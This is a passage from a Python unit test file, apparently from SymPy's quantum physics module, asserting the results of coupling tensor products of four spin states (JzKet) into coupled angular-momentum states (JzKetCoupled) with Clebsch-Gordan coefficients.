((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== -JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 0)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 6
- JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 0)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 6
- JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
+ sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
== -sqrt(2)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
-1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
== sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 3
- sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== -sqrt(6)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
-1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== -sqrt(3)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 2
+ JzKetCoupled(
2,
-1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
) == JzKetCoupled(
2,
-2,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
# j1=1/2, j2=1/2, j3=1/2, j4=1
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
)
) == JzKetCoupled(
Rational(5, 2),
Rational(5, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
)
)
== sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 2
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
)
)
== sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
+ 2
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
)
)
== 2
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
)
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 2
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
)
)
== sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
)
)
== sqrt(3)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
)
)
== -sqrt(3)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
)
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
)
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 2
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
)
)
== -sqrt(3)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
)
)
== sqrt(3)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
)
)
== sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
)
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
)
)
== 2
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
- 2
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
